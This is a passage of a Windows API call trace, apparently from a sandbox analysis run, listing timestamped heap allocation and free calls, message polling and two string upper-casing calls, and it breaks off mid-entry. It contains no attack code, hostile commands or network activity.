[0087.819] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9e68 | out: hHeap=0x2af0000) returned 1 [0087.819] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71a98 | out: hHeap=0x2af0000) returned 1 [0087.819] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9e20 | out: hHeap=0x2af0000) returned 1 [0087.819] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9e20 [0087.819] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9e50 [0087.819] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9e68 [0087.819] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a71a38 [0087.819] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9e68 | out: hHeap=0x2af0000) returned 1 [0087.819] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71a38 | out: hHeap=0x2af0000) returned 1 [0087.819] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9e50 | out: hHeap=0x2af0000) returned 1 [0087.819] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9e50 [0087.819] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9e68 [0087.819] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9e98 [0087.819] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a71a88 [0087.820] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9e98 | out: hHeap=0x2af0000) returned 1 [0087.820] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71a88 | out: hHeap=0x2af0000) returned 1 [0087.820] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9e68 | out: hHeap=0x2af0000) returned 1 [0087.820] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9e68 [0087.820] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9e98 [0087.820] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9f40 [0087.820] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a71a88 [0087.820] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9f40 | out: hHeap=0x2af0000) returned 1 [0087.820] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71a88 | out: hHeap=0x2af0000) returned 1 [0087.820] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9e98 | out: hHeap=0x2af0000) returned 1 [0087.820] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9e98 [0087.820] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9f70 [0087.820] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa0c0 [0087.820] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a71b08 [0087.820] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa0c0 | out: hHeap=0x2af0000) returned 1 [0087.820] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71b08 | out: hHeap=0x2af0000) returned 1 [0087.820] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9f70 | out: hHeap=0x2af0000) returned 1 [0087.820] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9fe8 [0087.820] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa180 [0087.820] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa108 [0087.820] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a71a38 [0087.820] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa108 | out: hHeap=0x2af0000) returned 1 [0087.820] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71a38 | out: hHeap=0x2af0000) returned 1 [0087.820] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa180 | out: hHeap=0x2af0000) returned 1 [0087.820] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a719e8 | out: hHeap=0x2af0000) returned 1 [0087.820] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71b48 | out: hHeap=0x2af0000) returned 1 [0087.820] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a719f8 | out: hHeap=0x2af0000) returned 1 [0087.820] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71a08 | out: hHeap=0x2af0000) returned 1 [0087.820] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71ae8 | out: hHeap=0x2af0000) returned 1 [0087.820] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a77cb0 | out: hHeap=0x2af0000) returned 1 [0087.821] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9d78 | out: hHeap=0x2af0000) returned 1 [0087.821] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71ad8 | out: hHeap=0x2af0000) returned 1 [0087.821] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9ec8 | out: hHeap=0x2af0000) returned 1 [0087.821] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9c88 | out: hHeap=0x2af0000) returned 1 [0087.821] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9d18 | out: hHeap=0x2af0000) returned 1 [0087.821] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9ee0 | out: hHeap=0x2af0000) returned 1 [0087.821] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9e08 | out: hHeap=0x2af0000) returned 1 [0087.821] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9dc0 | out: hHeap=0x2af0000) returned 1 [0087.821] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9ca0 | out: hHeap=0x2af0000) returned 1 [0087.821] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9d30 | out: hHeap=0x2af0000) returned 1 [0087.821] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9cd0 | out: hHeap=0x2af0000) returned 1 [0087.821] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9da8 | out: hHeap=0x2af0000) returned 1 [0087.821] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9f10 | out: hHeap=0x2af0000) returned 1 [0087.821] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9ef8 | out: hHeap=0x2af0000) returned 1 [0087.821] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9cb8 | out: hHeap=0x2af0000) returned 1 [0087.821] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9c70 | out: hHeap=0x2af0000) returned 1 [0087.821] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9f28 | out: hHeap=0x2af0000) returned 1 [0087.821] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9e80 | out: hHeap=0x2af0000) returned 1 [0087.821] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9c40 | out: hHeap=0x2af0000) returned 1 [0087.821] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9d48 | out: hHeap=0x2af0000) returned 1 [0087.821] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9d00 | out: hHeap=0x2af0000) returned 1 [0087.821] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9d60 | out: hHeap=0x2af0000) returned 1 [0087.821] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a5dfa8 | out: hHeap=0x2af0000) returned 1 [0087.821] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a719b8 | out: hHeap=0x2af0000) returned 1 [0087.821] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9eb0 | out: hHeap=0x2af0000) returned 1 [0087.821] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9df0 | out: hHeap=0x2af0000) returned 1 [0087.821] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9e38 | out: hHeap=0x2af0000) returned 1 [0087.821] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71a18 | out: hHeap=0x2af0000) returned 1 [0087.821] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a69bb0 | out: hHeap=0x2af0000) returned 1 [0087.821] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x29f7200 | out: hHeap=0x2af0000) returned 1 [0087.821] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9c58 | out: hHeap=0x2af0000) returned 1 [0087.821] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9dd8 | out: hHeap=0x2af0000) returned 1 [0087.821] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9ce8 | out: hHeap=0x2af0000) returned 1 [0087.821] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x29f7020 | out: hHeap=0x2af0000) returned 1 [0087.822] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a719d8 | out: hHeap=0x2af0000) returned 1 [0087.822] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x29f7698 | out: hHeap=0x2af0000) returned 1 [0087.822] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x214) returned 0x29f7698 [0087.822] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a74958 | out: hHeap=0x2af0000) returned 1 [0087.822] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0087.822] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71b88 [0087.822] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71a58 [0087.822] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71a38 [0087.822] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x18) returned 0x29f7200 [0087.822] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a719d8 [0087.822] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9cb8 [0087.822] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9e38 [0087.822] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a719b8 [0087.822] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9ee0 [0087.822] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a719b8 | out: hHeap=0x2af0000) returned 1 [0087.822] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9ee0 | out: hHeap=0x2af0000) returned 1 [0087.822] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9e38 | out: hHeap=0x2af0000) returned 1 [0087.822] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9cb8 | out: hHeap=0x2af0000) returned 1 [0087.822] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a719d8 | out: hHeap=0x2af0000) returned 1 [0087.822] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71a38 | out: hHeap=0x2af0000) returned 1 [0087.822] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x29f7200 | out: hHeap=0x2af0000) returned 1 [0087.822] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71a58 | out: hHeap=0x2af0000) returned 1 [0087.822] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71b88 | out: hHeap=0x2af0000) returned 1 [0087.822] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x38) returned 0x2a5ebc0 [0087.822] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0087.822] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a5ebc0 | out: hHeap=0x2af0000) returned 1 [0087.822] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0087.822] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71a58 [0087.822] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9ca0 [0087.822] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9e80 [0087.823] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71a98 [0087.823] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9dc0 [0087.823] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71a98 | out: hHeap=0x2af0000) returned 1 [0087.823] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9dc0 | out: hHeap=0x2af0000) returned 1 [0087.823] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9e80 | out: hHeap=0x2af0000) returned 1 [0087.823] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9ca0 | out: hHeap=0x2af0000) returned 1 [0087.823] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71a58 | out: hHeap=0x2af0000) returned 1 [0087.823] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9ad8 | out: hHeap=0x2af0000) returned 1 [0087.823] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a719c8 | out: hHeap=0x2af0000) returned 1 [0087.823] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9bf8 | out: hHeap=0x2af0000) returned 1 [0087.823] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0087.823] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71b88 [0087.823] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a719e8 [0087.823] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9ad8 [0087.823] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa99d0 [0087.823] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71a58 [0087.823] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9bb0 [0087.823] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71a58 | out: hHeap=0x2af0000) returned 1 [0087.823] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9bb0 | out: hHeap=0x2af0000) returned 1 [0087.823] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa99d0 | out: hHeap=0x2af0000) returned 1 [0087.823] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9ad8 | out: hHeap=0x2af0000) returned 1 [0087.823] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a719e8 | out: hHeap=0x2af0000) returned 1 [0087.823] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71b88 | out: hHeap=0x2af0000) returned 1 [0087.823] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9c28 | out: hHeap=0x2af0000) returned 1 [0087.823] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71b78 | out: hHeap=0x2af0000) returned 1 [0087.825] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9b08 | out: hHeap=0x2af0000) returned 1 [0087.825] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0087.825] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a719b8 [0087.825] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a719b8 | out: hHeap=0x2af0000) returned 1 [0087.825] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a5edc0 | out: hHeap=0x2af0000) returned 1 [0087.825] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0087.825] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a719c8 [0087.825] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71ad8 [0087.825] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x18) returned 0x29f71a0 [0087.825] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9b50 [0087.825] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9bb0 [0087.825] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71af8 [0087.825] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9ad8 [0087.826] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71af8 | out: hHeap=0x2af0000) returned 1 [0087.826] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9ad8 | out: hHeap=0x2af0000) returned 1 [0087.826] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9bb0 | out: hHeap=0x2af0000) returned 1 [0087.826] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9b50 | out: hHeap=0x2af0000) returned 1 [0087.826] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x29f71a0 | out: hHeap=0x2af0000) returned 1 [0087.826] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71ad8 | out: hHeap=0x2af0000) returned 1 [0087.826] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a719c8 | out: hHeap=0x2af0000) returned 1 [0087.826] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9a00 [0087.826] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0xc) returned 0x2aa9bf8 [0087.826] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0xc) returned 0x2aa9ad8 [0087.826] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0xc) returned 0x2aa9b08 [0087.826] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9b50 [0087.826] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0xc) returned 0x2aa9a78 [0087.826] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77cb0 [0087.826] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9a00 | out: hHeap=0x2af0000) returned 1 [0087.826] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0xc) returned 0x2aa9b38 [0087.826] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0xc) returned 0x2aa9bb0 [0087.826] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0xc) returned 0x2aa99b8 [0087.826] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9c10 [0087.826] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0xc) returned 0x2aa9c28 [0087.826] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x40) returned 0x2a5dfa8 [0087.826] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a77cb0 | out: hHeap=0x2af0000) returned 1 [0087.826] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0xc) returned 0x2aa9940 [0087.826] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa99d0 [0087.826] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0xc) returned 0x2aa9a00 [0087.826] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0xc) returned 0x2aa9a30 [0087.826] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9c40 [0087.826] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0xc) returned 0x2aa9d48 [0087.826] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0xc) returned 0x2aa9c58 [0087.827] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9eb0 [0087.827] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0xc) returned 0x2aa9ef8 [0087.827] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0xc) returned 0x2aa9e38 [0087.827] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9d60 [0087.827] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9f28 [0087.827] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71ac8 [0087.827] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77cb0 [0087.827] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a71a38 [0087.827] CharUpperBuffW (in: lpsz="A4F00A00447", cchLength=0xb | out: lpsz="A4F00A00447") returned 0xb [0087.827] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a77cb0 | out: hHeap=0x2af0000) returned 1 [0087.827] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71a38 | out: hHeap=0x2af0000) returned 1 [0087.827] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0xc) returned 0x2aa9cb8 [0087.827] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x40) returned 0x2a73ed8 [0087.827] PeekMessageW (in: lpMsg=0x8cef40, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cef40) returned 0 [0087.827] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71b78 [0087.827] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71ad8 [0087.827] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9cd0 [0087.827] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9e80 [0087.827] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71a88 [0087.827] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9d00 [0087.827] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71a88 | out: hHeap=0x2af0000) returned 1 [0087.827] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a71b38 [0087.827] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77cb0 [0087.827] CharUpperBuffW (in: lpsz="SSA4F00A00447", cchLength=0xd | out: lpsz="SSA4F00A00447") returned 0xd [0087.827] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a77cb0 | out: hHeap=0x2af0000) returned 1 [0087.827] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71b38 | out: hHeap=0x2af0000) returned 1 [0087.827] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9d00 | out: hHeap=0x2af0000) returned 1 [0087.827] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9e80 | out: hHeap=0x2af0000) returned 1 [0087.827] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9cd0 | out: hHeap=0x2af0000) returned 1 [0087.828] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71ad8 | out: hHeap=0x2af0000) returned 1 [0087.828] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71b78 | out: hHeap=0x2af0000) returned 1 [0087.828] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x38) returned 0x2a5e880 [0087.828] PeekMessageW (in: lpMsg=0x8cef40, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cef40) returned 0 [0087.828] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a5e880 | out: hHeap=0x2af0000) returned 1 [0087.828] PeekMessageW (in: lpMsg=0x8cef40, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cef40) returned 0 [0087.828] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71a88 [0087.828] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a719c8 [0087.828] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9ec8 [0087.828] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9da8 [0087.828] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71b38 [0087.828] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9ca0 [0087.828] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71b38 | out: hHeap=0x2af0000) returned 1 [0087.828] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9ca0 | out: hHeap=0x2af0000) returned 1 [0087.828] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9da8 | out: hHeap=0x2af0000) returned 1 [0087.828] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9ec8 | out: hHeap=0x2af0000) returned 1 [0087.828] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a719c8 | out: hHeap=0x2af0000) returned 1 [0087.828] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71a88 | out: hHeap=0x2af0000) returned 1 [0087.828] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a73ed8 | out: hHeap=0x2af0000) returned 1 [0087.828] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9cb8 | out: hHeap=0x2af0000) returned 1 [0087.828] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71ac8 | out: hHeap=0x2af0000) returned 1 [0087.828] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9df0 [0087.828] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71b38 [0087.828] RtlAllocateHeap 